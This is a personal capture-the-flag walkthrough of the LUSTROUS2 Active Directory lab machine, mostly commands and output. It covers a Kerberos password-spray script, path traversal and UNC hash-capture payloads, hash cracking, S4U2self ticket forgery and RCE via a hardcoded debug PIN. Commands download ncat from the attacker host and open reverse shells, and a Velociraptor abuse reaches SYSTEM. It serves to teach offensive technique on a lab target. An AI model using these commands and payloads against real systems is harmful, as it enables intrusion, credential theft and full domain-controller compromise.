LUSTROUS2-HTB Notes

LUSTROUS2

These are my notes on the LUSTROUS2 box from Vulnlab, which has since been deployed to HackTheBox.

LUSTROUS2: 10.10.66.32

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd

ftp> ls
229 Entering Extended Passive Mode (|||60630|)
125 Data connection already open; Transfer starting.
09-06-24  04:20AM       <DIR>          Development  #empty
09-06-24  11:03PM       <DIR>          Homes  #each user's directory is access denied, but the directory names are a ready-made username list (see below)
08-31-24  12:57AM       <DIR>          HR  #empty
08-31-24  12:57AM       <DIR>          IT  #empty
09-09-24  09:25AM       <DIR>          ITSEC  #audit_draft.txt, interesting
08-31-24  12:58AM       <DIR>          Production  #empty
08-31-24  12:58AM       <DIR>          SEC  #empty


ftp> cd ITSEC
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||60644|)
125 Data connection already open; Transfer starting.
09-07-24  02:50AM                  207 audit_draft.txt

Homes: 

229 Entering Extended Passive Mode (|||60629|)
125 Data connection already open; Transfer starting.
09-06-24  11:03PM       <DIR>          Aaron.Norman
09-06-24  11:03PM       <DIR>          Adam.Barnes
09-06-24  11:03PM       <DIR>          Amber.Ward
09-06-24  11:03PM       <DIR>          Andrea.Smith
09-06-24  11:03PM       <DIR>          Ann.Lynch
09-06-24  11:03PM       <DIR>          Callum.Oliver
09-06-24  11:03PM       <DIR>          Carly.Walker
09-06-24  11:03PM       <DIR>          Chelsea.Smith
09-06-24  11:03PM       <DIR>          Chloe.Hammond
09-06-24  11:03PM       <DIR>          Christopher.Lawson
09-06-24  11:03PM       <DIR>          Claire.Parry
09-06-24  11:03PM       <DIR>          Darren.Lewis
09-06-24  11:03PM       <DIR>          Deborah.Jones
09-06-24  11:03PM       <DIR>          Dominic.West
09-06-24  11:03PM       <DIR>          Duncan.Smith
09-06-24  11:03PM       <DIR>          Elaine.Gallagher
09-06-24  11:03PM       <DIR>          Eleanor.Gregory
09-06-24  11:03PM       <DIR>          Emma.Bell
09-06-24  11:03PM       <DIR>          Francesca.Norman
09-06-24  11:03PM       <DIR>          Gary.Richards
09-06-24  11:03PM       <DIR>          Gerard.Ward
09-06-24  11:03PM       <DIR>          Glenn.Williams
09-06-24  11:03PM       <DIR>          Graeme.Pritchard
09-06-24  11:03PM       <DIR>          Harriet.Richardson
09-06-24  11:03PM       <DIR>          Henry.Connor
09-06-24  11:03PM       <DIR>          Howard.Robinson
09-06-24  11:03PM       <DIR>          Jacqueline.Phillips
09-06-24  11:03PM       <DIR>          Janice.Collier
09-06-24  11:03PM       <DIR>          Jasmine.Johnson
09-06-24  11:03PM       <DIR>          Joan.Wall
09-06-24  11:03PM       <DIR>          Judith.Francis
09-06-24  11:03PM       <DIR>          Justin.Williams
09-06-24  11:03PM       <DIR>          Kyle.Hussain
09-06-24  11:03PM       <DIR>          Kyle.Lloyd
09-06-24  11:03PM       <DIR>          Lawrence.Bryan
09-06-24  11:03PM       <DIR>          Leah.Elliott
09-06-24  11:03PM       <DIR>          Lewis.Khan
09-06-24  11:03PM       <DIR>          Liam.Wheeler
09-06-24  11:03PM       <DIR>          Lisa.Begum
09-06-24  11:03PM       <DIR>          Louis.Phillips
09-06-24  11:03PM       <DIR>          Lydia.Parker
09-06-24  11:03PM       <DIR>          Malcolm.Yates
09-06-24  11:03PM       <DIR>          Marie.Hill
09-06-24  11:03PM       <DIR>          Martin.Hamilton
09-06-24  11:03PM       <DIR>          Mathew.Roberts
09-06-24  11:03PM       <DIR>          Melissa.Thompson
09-06-24  11:03PM       <DIR>          Nathan.Carter
09-06-24  11:03PM       <DIR>          Nicola.Clarke
09-06-24  11:03PM       <DIR>          Nicola.Hall
09-06-24  11:03PM       <DIR>          Nigel.Lee
09-06-24  11:03PM       <DIR>          Pamela.Taylor
09-06-24  11:03PM       <DIR>          Robert.Russell
09-06-24  11:03PM       <DIR>          Ryan.Davies
09-06-24  11:03PM       <DIR>          Ryan.Moore
09-06-24  11:03PM       <DIR>          Ryan.Rowe
09-06-24  11:03PM       <DIR>          Samantha.Smith
09-06-24  11:03PM       <DIR>          Sara.Matthews
09-06-24  11:03PM       <DIR>          ShareSvc
09-06-24  11:03PM       <DIR>          Sharon.Birch
09-06-24  11:03PM       <DIR>          Sharon.Evans
09-06-24  11:03PM       <DIR>          Stacey.Barber
09-06-24  11:03PM       <DIR>          Stacey.Griffiths
09-06-24  11:03PM       <DIR>          Stephanie.Baxter
09-06-24  11:03PM       <DIR>          Stephanie.Davies
09-06-24  11:03PM       <DIR>          Steven.Sutton
09-06-24  11:03PM       <DIR>          Susan.Johnson
09-06-24  11:03PM       <DIR>          Terence.Jordan
09-06-24  11:03PM       <DIR>          Thomas.Myers
09-06-24  11:03PM       <DIR>          Tony.Davies
09-06-24  11:03PM       <DIR>          Victoria.Williams
09-06-24  11:03PM       <DIR>          Wayne.Taylor


#Turn the Homes listing into users.txt, one name per line. The directory names are in Firstname.Lastname form and match the domain logon names used later (lustrous2.vl/thomas.myers, lustrous2\sharesvc):

Aaron.Norman
Adam.Barnes
Amber.Ward
Andrea.Smith
Ann.Lynch
Callum.Oliver
Carly.Walker
Chelsea.Smith
Chloe.Hammond
Christopher.Lawson
Claire.Parry
Darren.Lewis
Deborah.Jones
Dominic.West
Duncan.Smith
Elaine.Gallagher
Eleanor.Gregory
Emma.Bell
Francesca.Norman
Gary.Richards
Gerard.Ward
Glenn.Williams
Graeme.Pritchard
Harriet.Richardson
Henry.Connor
Howard.Robinson
Jacqueline.Phillips
Janice.Collier
Jasmine.Johnson
Joan.Wall
Judith.Francis
Justin.Williams
Kyle.Hussain
Kyle.Lloyd
Lawrence.Bryan
Leah.Elliott
Lewis.Khan
Liam.Wheeler
Lisa.Begum
Louis.Phillips
Lydia.Parker
Malcolm.Yates
Marie.Hill
Martin.Hamilton
Mathew.Roberts
Melissa.Thompson
Nathan.Carter
Nicola.Clarke
Nicola.Hall
Nigel.Lee
Pamela.Taylor
Robert.Russell
Ryan.Davies
Ryan.Moore
Ryan.Rowe
Samantha.Smith
Sara.Matthews
ShareSvc
Sharon.Birch
Sharon.Evans
Stacey.Barber
Stacey.Griffiths
Stephanie.Baxter
Stephanie.Davies
Steven.Sutton
Susan.Johnson
Terence.Jordan
Thomas.Myers
Tony.Davies
Victoria.Williams
Wayne.Taylor



┌──(root㉿kali)-[/home/…/VL/LUSTROUS2/10.10.66.32/FTP]
└─# cat audit_draft.txt
Audit Report Issue Tracking

[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled

[Open] Weak User Passwords



Spraying users.txt as both username and password (username-as-password): nothing.

Spraying users.txt with an empty password: nothing.



Crackmapexec Troubleshooting:  

crackmapexec smb 10.10.66.32 -d lustrous2.vl -u users.txt -p 'Lustrous2024' --continue-on-success
SMB         10.10.66.32     445    10.10.66.32      [*]  x64 (name:10.10.66.32) (domain:lustrous2.vl) (signing:True) (SMBv1:False)
SMB         10.10.66.32     445    10.10.66.32      [-] lustrous2.vl\Aaron.Norman:Lustrous2024 STATUS_NOT_SUPPORTED
SMB         10.10.66.32     445    10.10.66.32      [-] lustrous2.vl\Adam.Barnes:Lustrous2024 STATUS_NOT_SUPPORTED
SMB         10.10.66.32     445    10.10.66.32      [-] lustrous2.vl\Amber.Ward:Lustrous2024 STATUS_NOT_SUPPORTED

STATUS_NOT_SUPPORTED on every attempt (instead of STATUS_LOGON_FAILURE) means the DC refuses the NTLM mechanism itself, which matches "[Fixed] NTLM Authentication Allowed" in the audit draft: authentication is only possible via Kerberos. Spray over Kerberos with crackmapexec by adding the -k flag:

crackmapexec smb 10.10.66.32 -d lustrous2.vl -u users.txt -p 'Lustrous2024' --continue-on-success -k

SMB         10.10.66.32     445    10.10.66.32      [-] lustrous2.vl\Thomas.Myers: KDC_ERR_S_PRINCIPAL_UNKNOWN

#KDC_ERR_S_PRINCIPAL_UNKNOWN is not a password failure. With -k the tool asks the KDC for a service ticket to cifs/<target>, and cifs/10.10.66.32 is not a registered SPN: Kerberos service tickets are bound to hostnames. Map lus2dc.lustrous2.vl in /etc/hosts and give that hostname as the target instead of the IP, and keep the attacker clock within 5 minutes of the DC (otherwise KRB_AP_ERR_SKEW). A wrong password then shows up as KDC_ERR_PREAUTH_FAILED and a hit as [+]. Since "Weak User Passwords" is the only open audit item, spray one candidate password across all users per round and keep an eye on the lockout threshold. The round with 'Lustrous2024' gives Thomas.Myers.
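Added example (my own helper, not the author's tooling and not part of impacket): a small Python wrapper that builds the user list from the Homes listing and runs the Kerberos spray one AS-REQ at a time through getTGT.py, classifying every reply by its Kerberos error code instead of eyeballing the output. It assumes the realm lustrous2.vl, a KDC reachable by the hostname lus2dc.lustrous2.vl (via /etc/hosts) and getTGT.py on PATH. SAMPLE_LISTING and fake_runner at the bottom are constructed so the file runs offline; they reproduce the outcome recorded in these notes (only Thomas.Myers:Lustrous2024 is valid).

```python
r"""Kerberos-only password spray helper.

Added example for these notes; not the author's tooling and not part of impacket.
(1) turns a Microsoft ftpd 'ls' of Homes into a username list, (2) wraps impacket's
getTGT.py so every attempt is a single AS-REQ against the KDC, and (3) reduces the
reply to a verdict so "wrong password" is not confused with "no such user",
"locked out" or "clock skew".
Assumptions: realm lustrous2.vl, KDC resolvable as lus2dc.lustrous2.vl, getTGT.py on PATH.
"""
import re
import subprocess
from typing import Callable, Dict, List

REALM = "lustrous2.vl"           # from the notes
KDC = "lus2dc.lustrous2.vl"      # assumed: hostname in /etc/hosts, never an IP

# One Microsoft ftpd listing line:  09-06-24  11:03PM       <DIR>          Aaron.Norman
LISTING_RE = re.compile(r"^\d{2}-\d{2}-\d{2}\s+\d{1,2}:\d{2}[AP]M\s+<DIR>\s+(\S.*?)\s*$")

# Kerberos error names as impacket prints them, mapped to what a sprayer should conclude.
VERDICTS = {
    "KDC_ERR_PREAUTH_FAILED":      "bad-password",
    "KDC_ERR_C_PRINCIPAL_UNKNOWN": "no-such-user",
    "KDC_ERR_CLIENT_REVOKED":      "locked-or-disabled",   # stop spraying this account
    "KDC_ERR_KEY_EXPIRED":         "valid-but-expired",    # the password IS right
    "KRB_AP_ERR_SKEW":             "clock-skew",           # sync with the DC first
    "KDC_ERR_S_PRINCIPAL_UNKNOWN": "service-unknown",      # wrong realm / IP used as hostname
}


def users_from_ftp_listing(listing: str) -> List[str]:
    """Directory names from an 'ls' of Homes, in listing order (files are skipped)."""
    users: List[str] = []
    for line in listing.splitlines():
        m = LISTING_RE.match(line.strip())
        if m:
            users.append(m.group(1))
    return users


def classify(output: str) -> str:
    """Reduce getTGT.py stdout+stderr to one verdict; VALID only when a ccache was written."""
    if "Saving ticket in" in output:
        return "VALID"
    for code, verdict in VERDICTS.items():
        if code in output:
            return verdict
    lines = output.strip().splitlines()
    return "unknown: " + (lines[-1] if lines else "<no output>")


def run_gettgt(user: str, password: str) -> str:
    """Real runner: one AS-REQ via getTGT.py (writes <user>.ccache on success)."""
    proc = subprocess.run(
        ["getTGT.py", f"{REALM}/{user}:{password}", "-dc-ip", KDC],
        capture_output=True, text=True, check=False)
    return proc.stdout + proc.stderr


def spray(users: List[str], password: str,
          runner: Callable[[str, str], str] = run_gettgt) -> Dict[str, str]:
    """One password against every user: one attempt per account per round, so a round
    costs each account at most one bad-password count against the lockout threshold."""
    return {user: classify(runner(user, password)) for user in users}


# --- constructed offline demo (no network) -------------------------------------------

SAMPLE_LISTING = """\
09-06-24  11:03PM       <DIR>          Aaron.Norman
09-06-24  11:03PM       <DIR>          ShareSvc
09-06-24  11:03PM       <DIR>          Thomas.Myers
09-07-24  02:50AM                  207 audit_draft.txt
"""


def fake_runner(user: str, password: str) -> str:
    """Stand-in for getTGT.py reproducing the outcome in the notes: only
    Thomas.Myers:Lustrous2024 is valid, everything else fails pre-authentication."""
    if user.lower() == "thomas.myers" and password == "Lustrous2024":
        return f"[*] Saving ticket in {user}.ccache\n"
    return "[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)\n"


if __name__ == "__main__":
    for user, verdict in spray(users_from_ftp_listing(SAMPLE_LISTING), "Lustrous2024",
                               runner=fake_runner).items():
        print(f"{user:20} {verdict}")
```

Run it as-is for the offline demo; drop runner=fake_runner to go live against the KDC. KDC_ERR_CLIENT_REVOKED means the account is disabled or already locked out, so a sprayer should skip that user rather than keep counting bad attempts against it.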


https://vuln.dev/vulnlab-lustrous2/

53/tcp    open  domain?		  Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.

#Nothing here without credentials: IIS only answers to Negotiate (Kerberos) authentication. See the HTTP section once we have a user.

88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-28 16:09:33Z)


#No AS-REP roasting: no account has Kerberos pre-authentication disabled.


135/tcp   open  msrpc         Microsoft Windows RPC

rpcclient 10.10.66.32 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED

#Not just "no anonymous access": NT_STATUS_NOT_SUPPORTED means the null session's NTLM authentication is rejected outright (NTLM disabled), so rpcclient never reaches an access check.

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)

ldapsearch -x -H ldap://10.10.66.32 -D '' -w '' -b "DC=lustrous2,DC=vl" '(objectClass=person)'

#Anonymous search refused: LDAPv3 here requires a bound (authenticated) account. Come back with credentials.


HTTP with a Kerberos ticket (the "HTTP Silver Ticket" of these notes): #LINUX

#This is ordinary Kerberos authentication to IIS with a TGT obtained from Thomas.Myers' password, not a forged silver ticket. With NTLM off the site only accepts Negotiate (Kerberos), so curl needs a ccache (KRB5CCNAME) and a working /etc/krb5.conf (below).


getTGT.py lustrous2.vl/thomas.myers:'Lustrous2024' -dc-ip lustrous2.vl

export KRB5CCNAME=thomas.myers.ccache

curl --negotiate -u : http://lus2dc.lustrous2.vl -I

┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]                                                                                           
└─# getTGT.py lustrous2.vl/thomas.myers:'Lustrous2024' -dc-ip lustrous2.vl

/usr/local/bin/getTGT.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'getTGT.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in thomas.myers.ccache

┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# export KRB5CCNAME=./thomas.myers.ccache


┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# klist
Ticket cache: FILE:./thomas.myers.ccache
Default principal: thomas.myers@LUSTROUS2.VL

Valid starting       Expires              Service principal
11/28/2024 12:44:24  11/28/2024 22:44:24  krbtgt/LUSTROUS2.VL@LUSTROUS2.VL
        renew until 11/29/2024 12:44:25

┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl -I

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvM79WazB+I9B13dyYwh47eeVUYhq
vsOqHh600QZgRpZ4KA33zYrRhMKH4Z+f8hE0bcrnLwh8pypm7c2mQvwVqEbp8nWH1AtnCpsDjubZiPWfjX36ZRHG//myz2Odw43fdDJSSPxCunLRKpwiCIZHS
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 28 Nov 2024 17:44:30 GMT

Make sure /etc/krb5.conf is set up, otherwise curl --negotiate cannot find the KDC for the LUSTROUS2.VL realm and the ticket is never used:

cat /etc/krb5.conf
[libdefaults]
        default_realm = LUSTROUS2.VL
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        fcc-mit-ticketflags = true
        dns_canonicalize_hostname = false
        dns_lookup_realm = false
        dns_lookup_kdc = true
        k5login_authoritative = false
[realms]
        LUSTROUS2.VL = {
                kdc = lustrous2.vl
                admin_server = lustrous2.vl
                default_admin = lustrous2.vl
        }
[domain_realm]
        .lustrous2.vl = LUSTROUS2.VL


curl --negotiate -u : 'http://lus2dc.lustrous2.vl/' -v:

[SNIP] 

    </thead>
    <tbody>
            <tr>
                <td>audit.txt</td>
                <td>
                    <a href="/File/Download?fileName=audit.txt" class="btn btn-primary">Download</a>
                </td>
            </tr>
    </tbody>
</table>
        </main>


[SNIP]

Path traversal on the download endpoint (a trailing ':' after a command in these notes only means "output follows"; the commands are run with -v):

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=audit.txt' -v

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../../../../../../../windows/system32/drivers/etc/hosts' -v

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../../Windows/boot.ini' -v

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=\\10.8.0.71\a' -v

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../web.config' -v

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' -v

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' --output LuShare.dll

#WINDOWS LFI WORKS: fileName is joined onto the download directory unchecked, so ../../ walks up to the application root (web.config and LuShare.dll come back, see below).

#The UNC path (\\10.8.0.71\a) makes the application open a file on our host over SMB, i.e. the web app's own identity authenticates outbound to us. Capture it with an SMB listener on 10.8.0.71 (Responder or similar; the listener is not shown in these notes).
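Added example (my own, not the LuShare source, which the notes only show being decompiled): why the two payload families above behave as they do on Windows, with a hardened join next to the vulnerable one. Python's ntpath implements the same Windows path rules that System.IO.Path.Combine follows (a relative name is appended, a rooted name such as a drive or UNC path replaces the base entirely), so this runs on Linux. The download directory C:\inetpub\lushare\wwwroot\files is an assumption: two levels under the application root, which is what makes ../../web.config land on C:\inetpub\lushare\web.config in the notes.

```python
r"""Why ../../web.config and \\10.8.0.71\a both work against /File/Download.

Added example for these notes; not the LuShare source and not .NET code. ntpath
reproduces the Windows path rules System.IO.Path.Combine follows: a relative name is
appended, a rooted name (drive or UNC) replaces the base. The download directory below
is an assumption (two levels under the app root C:\inetpub\lushare).
"""
import ntpath

DOWNLOAD_DIR = r"C:\inetpub\lushare\wwwroot\files"   # assumed location


def vulnerable_join(base: str, file_name: str) -> str:
    """What the unchecked endpoint effectively does: combine, then let the OS resolve it."""
    return ntpath.normpath(ntpath.join(base, file_name))


def safe_join(base: str, file_name: str) -> str:
    """Hardened version: accept a bare file name only, then verify containment anyway."""
    base_norm = ntpath.normpath(base)
    # 1) Reject anything that is not a plain name: separators, drive letters, UNC roots.
    if file_name != ntpath.basename(file_name) or ntpath.splitdrive(file_name)[0]:
        raise ValueError(f"rejected file name: {file_name!r}")
    # 2) Resolve and confirm the result is still under the download directory
    #    (catches '..' and '.' on their own, and any future slip in rule 1).
    candidate = ntpath.normpath(ntpath.join(base_norm, file_name))
    try:
        inside = ntpath.commonpath([base_norm.lower(), candidate.lower()]) == base_norm.lower()
    except ValueError:          # different drive / UNC root: never inside
        inside = False
    if not inside or candidate.lower() == base_norm.lower():
        raise ValueError(f"path escapes download directory: {candidate!r}")
    return candidate


def is_rejected(base: str, file_name: str) -> bool:
    """True when the hardened join refuses the name."""
    try:
        safe_join(base, file_name)
    except ValueError:
        return True
    return False


# Payloads taken from the notes, plus the legitimate file name the page offers.
PAYLOADS = {
    "audit.txt": "legit download",
    r"..\..\web.config": "traversal to app root (backslashes)",
    "../../LuShare.dll": "traversal to app root (forward slashes)",
    r"\\10.8.0.71\a": "UNC path -> outbound SMB auth to attacker",
    "..": "bare parent directory",
}

if __name__ == "__main__":
    for name, what in PAYLOADS.items():
        resolved = vulnerable_join(DOWNLOAD_DIR, name)
        try:
            hardened = safe_join(DOWNLOAD_DIR, name)
        except ValueError as e:
            hardened = f"REJECTED ({e})"
        print(f"{what:45} vulnerable -> {resolved}")
        print(f"{'':45} hardened   -> {hardened}")
```

The UNC case is the one most people miss: no amount of stripping "../" helps when a rooted second argument simply discards the base, which is why the fix rejects anything that is not a bare file name and then still checks containment.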

#Got the HASH of LUSTROUS2\ShareSvc

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#1Service        (ShareSvc)
1g 0:00:00:53 DONE (2024-11-28 13:04) 0.01857g/s 266270p/s 266270c/s 266270C/s #1WIF3Y.."chito"
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.


ShareSvc:#1Service

S4U2self ticket for Ryan.Davies using the ShareSvc credential (what these notes call a silver ticket):

#Ryan.Davies is a member of the ShareAdmins group, so the site treats him as an admin of the share application on port 80. With ShareSvc's password we ask the KDC for a service ticket to ShareSvc on behalf of Ryan.Davies (S4U2self: getST -self -impersonate) and rewrite the service name to HTTP/lus2dc.lustrous2.vl (-altservice). The ticket is encrypted with ShareSvc's key, which is the identity the web app runs under (whoami below returns lustrous2\sharesvc), and the service name is not in the encrypted part of the ticket, so IIS accepts it and the application greets us as LUSTROUS2\Ryan.Davies.

getTGT.py lustrous2.vl/ShareSvc:'#1Service' -dc-ip lustrous2.vl

export KRB5CCNAME=ShareSvc.ccache

getST.py -self -impersonate "Ryan.Davies" -k -no-pass lustrous2.vl/ShareSvc -altservice HTTP/lus2dc.lustrous2.vl

getST.py -spn 'HTTP/lus2dc.lustrous2.vl' -dc-ip 'lus2dc.lustrous2.vl' "lustrous2.vl"/"ShareSvc" -hashes :'CA345B5B5E85A8D468FCFBA9F4F8D460' -self -impersonate 'Ryan.Davies' -debug -altservice 'HTTP/lus2dc.lustrous2.vl'

Same command from a git checkout of impacket (the packaged 0.9.24 getST.py predates -self and -altservice; see Impacket Troubleshooting below):

python3 /home/kali/Kali-Tools/attacktive-directory-tools/impacket/examples/getST.py -spn 'HTTP/lus2dc.lustrous2.vl' -dc-ip 'lus2dc.lustrous2.vl' "lustrous2.vl"/"ShareSvc" -hashes :'CA345B5B5E85A8D468FCFBA9F4F8D460' -self -impersonate 'Ryan.Davies' -debug -altservice 'HTTP/lus2dc.lustrous2.vl'

export KRB5CCNAME=Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache

curl --negotiate -u : http://lus2dc.lustrous2.vl -I

curl --negotiate -u : http://lus2dc.lustrous2.vl -v 

curl --negotiate -u : http://lus2dc.lustrous2.vl -v:

                            <!--
                            <li class="nav-item">
                                <a class="nav-link" href="/File/Debug">Debug</a>
                            </li>
                            -->
                    </ul>
                    <p b-d5yzov7vxd class="nav navbar-text">Well met, LUSTROUS2\Ryan.Davies!</p>
                </div>
            </div>


#IT WORKS !

/File/Debug requires a PIN, so read web.config through the download traversal to find out which binary the site runs:

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../web.config' -v:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
* Connection #0 to host lus2dc.lustrous2.vl left intact

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' -v:

curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' --output LuShare.dll

Decompile LuShare.dll with dnSpy (or open it in Visual Studio) as usual; the Debug PIN is hardcoded in it:

#FOUND THE PIN ! 

PIN = ba45c518

curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=whoami'

┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=whoami'

lustrous2\sharesvc


RCE ACHIEVED !

┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=powershell.exe -c wget http://10.8.0.71/ncat.exe -O C:\Users\Public\ncat.exe '


┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=C:\Users\Public\ncat.exe -nv 10.8.0.71 1234 -e CMD'

sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.66.32] 60878
Microsoft Windows [Version 10.0.20348.2655]
(c) Microsoft Corporation. All rights reserved.

C:\inetpub\lushare>whoami
whoami
lustrous2\sharesvc

C:\inetpub\lushare>hostname
hostname
LUS2DC

#USER-SHELL !

To use the Kerberos ticket (KRB5CCNAME) from Firefox as well, set in about:config:

about:config: 

network.negotiate-auth.delegation-uris: lus2dc.lustrous2.vl
network.negotiate-auth.trusted-uris: lus2dc.lustrous2.vl
network.negotiate-auth.using-native-gsslib: true

https://ethicxz.github.io/VL-Lustrous2-Machine/

https://vuln.dev/vulnlab-lustrous2/



Impacket Troubleshooting: 

https://github.com/fortra/impacket/issues/1328

For anyone else having this issue, make sure you re-install (python -m pip install .) after doing git pull.


C:\>whoami
whoami
lustrous2\sharesvc

C:\>hostname
hostname
LUS2DC

C:\>dir
dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of C:\

09/06/2024  07:39 AM    <DIR>          datastore
09/06/2024  04:37 AM    <DIR>          inetpub
05/08/2021  12:20 AM    <DIR>          PerfLogs
09/07/2024  04:41 AM    <DIR>          Program Files
09/06/2024  04:38 AM    <DIR>          Program Files (x86)
09/06/2024  05:57 AM    <DIR>          temp
08/31/2024  12:56 AM    <DIR>          Users
09/06/2024  07:52 AM                36 user_2e9c1.txt
09/07/2024  04:55 AM    <DIR>          Windows
               1 File(s)             36 bytes
               8 Dir(s)   4,526,194,688 bytes free

C:\>type user_2e9c1.txt
type user_2e9c1.txt
VL{REDACTED}

USER.TXT: VL{REDACTED}
 

PRIV ESC: 

C:\Program Files\VelociraptorServer>dir
dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of C:\Program Files\VelociraptorServer

09/06/2024  07:34 AM    <DIR>          .
09/07/2024  04:41 AM    <DIR>          ..
09/06/2024  07:34 AM             2,563 client.config.yaml
09/06/2024  07:34 AM            12,972 server.config.yaml
09/06/2024  07:03 AM        60,144,064 velociraptor-v0.72.4-windows-amd64.exe
               3 File(s)     60,159,599 bytes
               2 Dir(s)   4,524,945,408 bytes free


Velociraptor's server is running as PID 2536 and listens on loopback only: the GUI on 8889, plus 8001 and 8003 (the API and monitoring ports of a default install). They are only reachable through a tunnel:

TCP    127.0.0.1:8001         0.0.0.0:0              LISTENING       2536
TCP    127.0.0.1:8001         127.0.0.1:49695        ESTABLISHED     2536
TCP    127.0.0.1:8003         0.0.0.0:0              LISTENING       2536
TCP    127.0.0.1:8889         0.0.0.0:0              LISTENING       2536

./chisel server -p 8000 --reverse 

chisel.exe client 10.8.0.71:8000 R:8889:localhost:8889



Check both "Program Files" and "Program Files (x86)" for third-party software that might be exploitable; here VelociraptorServer is the odd one out.



VelociraptorServer Windows Priv Esc:

#server.config.yaml is readable by sharesvc and contains the server's CA private key, so anyone who can read it can mint an API client certificate with the administrator role. VQL from an API client runs inside the Velociraptor server process, which runs as SYSTEM, so execve() from that client is code execution as SYSTEM. (Restricting the ACL on server.config.yaml is the fix.)

C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml

C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','whoami'])"

https://vuln.dev/vulnlab-lustrous2/#escalating-privileges-using-velociraptor

velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','dir C:\\Users\\Public'])"

velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','C:\\Users\\Public\\ncat.exe -nv 10.8.0.71 4444 -e CMD'])"

sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.66.32] 60006
Microsoft Windows [Version 10.0.20348.2655]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
LUS2DC


SYSTEM-SHELL ! 

C:\Users\Administrator\Desktop>whoami
whoami
